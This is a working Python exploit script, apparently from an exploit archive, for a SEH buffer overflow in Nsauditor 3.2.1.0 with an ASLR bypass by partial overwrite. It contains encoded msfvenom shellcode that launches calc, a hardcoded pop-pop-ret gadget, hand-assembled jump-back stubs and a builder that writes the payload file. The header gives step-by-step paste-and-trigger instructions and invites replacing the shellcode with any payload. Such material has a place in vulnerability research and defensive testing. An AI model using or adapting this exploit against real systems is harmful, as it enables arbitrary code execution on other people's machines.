## https://sploitus.com/exploit?id=PACKETSTORM:157286
# Exploit Title: Nsauditor 3.2.1.0 - Buffer Overflow (SEH+ASLR bypass (3 bytes overwrite))  
# Date: 2020-04-17  
# Exploit Author: Cervoise  
# Vendor Homepage: https://www.nsauditor.com/  
# Software Link: https://www.nsauditor.com/downloads/nsauditor_setup.exe  
# Version: 3.2.1.0 and 3.0.28  
# Tested on: Windows 10.0.18363.778 x86 Pro EN  
  
# Exploit originally found on Nsauditor 3.0.28.0 by ACHILLES (https://www.exploit-db.com/exploits/46005)
# Latest version Nsauditor 3.2.1.0 (4/13/2020 1:51:53) is still vulnerable
  
# 1 -> Replace the shellcode with the one you want
# 2 -> Open nsauditor-3-2-1-exploit.txt and copy content to clipboard  
# 3 -> Open Nsauditor  
# 4 -> In the Window select "Tools" -> "Dns Lookup"  
# 5 -> Paste the content into the field "Dns Query"
# 6 -> Click "Resolve"  
  
#!/usr/bin/python3  
  
# Badchars -> \x00\x0a\x0d\x2e\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9f\xf0\xf1\xf2\xf3\xf4\xf5\xf6
# There may be fewer badchars between \x80 and \x9f than listed; only the ones the author needed were checked.
# The payload is delivered by copy/paste into a text field, so the editor/clipboard code page presumably decides which high bytes survive -- verify in a debugger.
  
# msfvenom -p windows/exec CMD=calc -e x86/alpha_mixed -f python -v shellcode
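import sys

# Payload generated with the msfvenom command in the header.  Replace it with
# whatever you want to run; the buffer layout below adapts to its length, up
# to the limit enforced in build_buffer().
shellcode = b""
shellcode += b"\x89\xe7\xd9\xe9\xd9\x77\xf4\x59\x49\x49\x49"
shellcode += b"\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43"
shellcode += b"\x43\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30"
shellcode += b"\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
shellcode += b"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
shellcode += b"\x42\x75\x4a\x49\x4b\x4c\x4a\x48\x6e\x62\x73"
shellcode += b"\x30\x37\x70\x75\x50\x35\x30\x6f\x79\x68\x65"
shellcode += b"\x36\x51\x6f\x30\x43\x54\x4e\x6b\x70\x50\x30"
shellcode += b"\x30\x4e\x6b\x43\x62\x56\x6c\x4c\x4b\x73\x62"
shellcode += b"\x54\x54\x6c\x4b\x61\x62\x65\x78\x36\x6f\x58"
shellcode += b"\x37\x71\x5a\x56\x46\x66\x51\x49\x6f\x6e\x4c"
shellcode += b"\x65\x6c\x51\x71\x53\x4c\x43\x32\x46\x6c\x47"
shellcode += b"\x50\x6f\x31\x4a\x6f\x66\x6d\x46\x61\x79\x57"
shellcode += b"\x69\x72\x69\x62\x46\x32\x36\x37\x4c\x4b\x63"
shellcode += b"\x62\x76\x70\x4c\x4b\x63\x7a\x45\x6c\x6e\x6b"
shellcode += b"\x72\x6c\x47\x61\x62\x58\x79\x73\x77\x38\x55"
shellcode += b"\x51\x7a\x71\x72\x71\x6e\x6b\x62\x79\x57\x50"
shellcode += b"\x37\x71\x78\x53\x4e\x6b\x57\x39\x72\x38\x5a"
shellcode += b"\x43\x54\x7a\x61\x59\x4e\x6b\x57\x44\x4c\x4b"
shellcode += b"\x45\x51\x39\x46\x30\x31\x79\x6f\x6e\x4c\x5a"
shellcode += b"\x61\x4a\x6f\x44\x4d\x63\x31\x79\x57\x76\x58"
shellcode += b"\x49\x70\x51\x65\x69\x66\x76\x63\x43\x4d\x58"
shellcode += b"\x78\x45\x6b\x51\x6d\x57\x54\x64\x35\x48\x64"
shellcode += b"\x46\x38\x6c\x4b\x42\x78\x67\x54\x36\x61\x6a"
shellcode += b"\x73\x31\x76\x6c\x4b\x44\x4c\x52\x6b\x6c\x4b"
shellcode += b"\x66\x38\x65\x4c\x57\x71\x4a\x73\x6e\x6b\x36"
shellcode += b"\x64\x4e\x6b\x47\x71\x38\x50\x6d\x59\x42\x64"
shellcode += b"\x35\x74\x51\x34\x31\x4b\x33\x6b\x70\x61\x42"
shellcode += b"\x79\x43\x6a\x50\x51\x6b\x4f\x4d\x30\x33\x6f"
shellcode += b"\x63\x6f\x43\x6a\x4e\x6b\x77\x62\x7a\x4b\x6e"
shellcode += b"\x6d\x53\x6d\x50\x6a\x67\x71\x4e\x6d\x6c\x45"
shellcode += b"\x4e\x52\x73\x30\x37\x70\x75\x50\x72\x70\x35"
shellcode += b"\x38\x46\x51\x4e\x6b\x52\x4f\x4f\x77\x4b\x4f"
shellcode += b"\x38\x55\x6f\x4b\x4c\x30\x6e\x55\x6c\x62\x71"
shellcode += b"\x46\x53\x58\x4f\x56\x6d\x45\x6d\x6d\x6d\x4d"
shellcode += b"\x39\x6f\x58\x55\x47\x4c\x44\x46\x43\x4c\x74"
shellcode += b"\x4a\x6b\x30\x49\x6b\x59\x70\x34\x35\x47\x75"
shellcode += b"\x6f\x4b\x50\x47\x56\x73\x73\x42\x70\x6f\x53"
shellcode += b"\x5a\x67\x70\x51\x43\x4b\x4f\x6b\x65\x31\x73"
shellcode += b"\x70\x61\x52\x4c\x30\x63\x73\x30\x41\x41"

# Bytes that must not appear in the buffer, copied from the header.  Note the
# list is self-described as conservative in the \x80-\x9f range, and it is
# inconsistent with the payload above: the msfvenom GetPC stub in the first
# seven bytes contains \xf4 (fnstenv [edi-0xc]), which the list marks as bad.
# check_badchars() therefore only *warns*; treat a hit as "confirm the bytes
# arrive intact in the debugger", not as proof the payload is broken.
BADCHARS = (
    b"\x00\x0a\x0d\x2e\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c"
    b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9f\xf0\xf1\xf2\xf3\xf4\xf5\xf6"
)

# 0x006ea017 : pop esi # pop ecx # ret | startnull {PAGE_EXECUTE_WRITECOPY}
#   [Nsauditor.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False,
#   v3.0.28.0 (C:\Program Files\Nsauditor\Nsauditor.exe)
# 0x006ea017 : pop esi # pop ecx # ret | startnull {PAGE_EXECUTE_WRITECOPY}
#   [Nsauditor.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False,
#   v3.2.1.0 (C:\Program Files\Nsauditor\Nsauditor.exe)
#
# The gadget lives in Nsauditor.exe itself, which is neither ASLR'd nor
# rebased, so a fixed address works across reboots (the "ASLR bypass" in the
# title) and is identical in both affected versions.  The address begins with
# a null byte and \x00 is a bad char, so only its three low bytes are written
# (little-endian 17 a0 6e) -- the "3 bytes overwrite".  The 0x00 high byte is
# presumably supplied by the terminator stored after the copied string, which
# is why the SEH record has to be the very last thing in the buffer.
# Running shellcode from the stack also assumes DEP is not enforced for this
# 32-bit process -- TODO confirm on the target before relying on it.
pop_pop_ret = b"\x17\xa0\x6e"

# nSEH: "EB C3" is a short jump with rel8 = -61.  Measured from the nSEH
# address that is 59 bytes back (0xffffffc5), which lands inside the 100-byte
# NOP pad that precedes going_back; the two trailing NOPs are filler.
jmp_back = b"\xeb\xc3\x90\x90"  # JMP 0xffffffc5

# Stage 2.  Once the pop/pop/ret handler returns into nSEH, a pointer to the
# tail of our buffer is three slots down the stack: three POPs move it into
# EAX, 5 * 0x79 = 0x25d (605) bytes are subtracted to land in the NOP sled
# ahead of the shellcode, and JMP EAX transfers control.  (The author notes an
# egghunter would also work but is not portable across Windows versions.)
# The subtraction is split into imm8 steps because SUB EAX, 0x25d would encode
# with \x00 bytes; 0x79 presumably keeps each immediate clear of the
# \x80-\x9f bad chars -- TODO confirm.  The 605-byte distance was tuned on the
# tested build; re-measure it if the overflow offset changes.
going_back = b"\x58"  # POP EAX
going_back += b"\x58"  # POP EAX
going_back += b"\x58"  # POP EAX
going_back += b"\x83\xE8\x79"  # SUB EAX,0x79
going_back += b"\x83\xE8\x79"  # SUB EAX,0x79
going_back += b"\x83\xE8\x79"  # SUB EAX,0x79
going_back += b"\x83\xE8\x79"  # SUB EAX,0x79
going_back += b"\x83\xE8\x79"  # SUB EAX,0x79
going_back += b"\xFF\xE0"  # JMP EAX

SEH_OFFSET = 5235  # bytes written before nSEH, from the original PoC
NOP_PAD = 100      # NOP slack between the shellcode and going_back
OUTPUT = "nsauditor-3-2-1-exploit.txt"


def check_badchars(data: bytes) -> bytes:
    """Return the distinct BADCHARS that occur in *data*, in ascending order.

    An empty result means no listed bad char is present.  See the BADCHARS
    note: a hit is something to verify, not a hard failure.
    """
    present = set(data) & set(BADCHARS)
    return bytes(sorted(present))


def build_buffer(payload: bytes) -> bytes:
    """Assemble the overflow string around *payload*.

    Layout, front to back:
      [NOP sled][payload][NOP_PAD NOPs][going_back][nSEH jmp_back][SEH pop_pop_ret]
    with nSEH pinned at SEH_OFFSET, so the sled shrinks as the payload grows.

    Raises ValueError when the payload does not fit.  The original script let
    the sled length go negative, which ``b"\\x90" * n`` silently turns into an
    empty sled -- the SEH record then lands at the wrong offset and the
    exploit fails without any hint why.
    """
    sled_len = SEH_OFFSET - len(payload) - len(going_back) - NOP_PAD
    if sled_len < 0:
        limit = SEH_OFFSET - len(going_back) - NOP_PAD
        raise ValueError(
            f"payload is {len(payload)} bytes; at most {limit} fit before the SEH record"
        )
    return b"".join((
        b"\x90" * sled_len,
        payload,
        b"\x90" * NOP_PAD,
        going_back,
        jmp_back + pop_pop_ret,  # nSEH / SEH
    ))


buffer = build_buffer(shellcode)

if __name__ == "__main__":
    hits = check_badchars(buffer)
    if hits:
        listed = " ".join(f"\\x{b:02x}" for b in hits)
        print(f"warning: listed bad chars present in buffer: {listed}", file=sys.stderr)
    # Write the exploit
    with open(OUTPUT, "wb") as fh:
        fh.write(buffer)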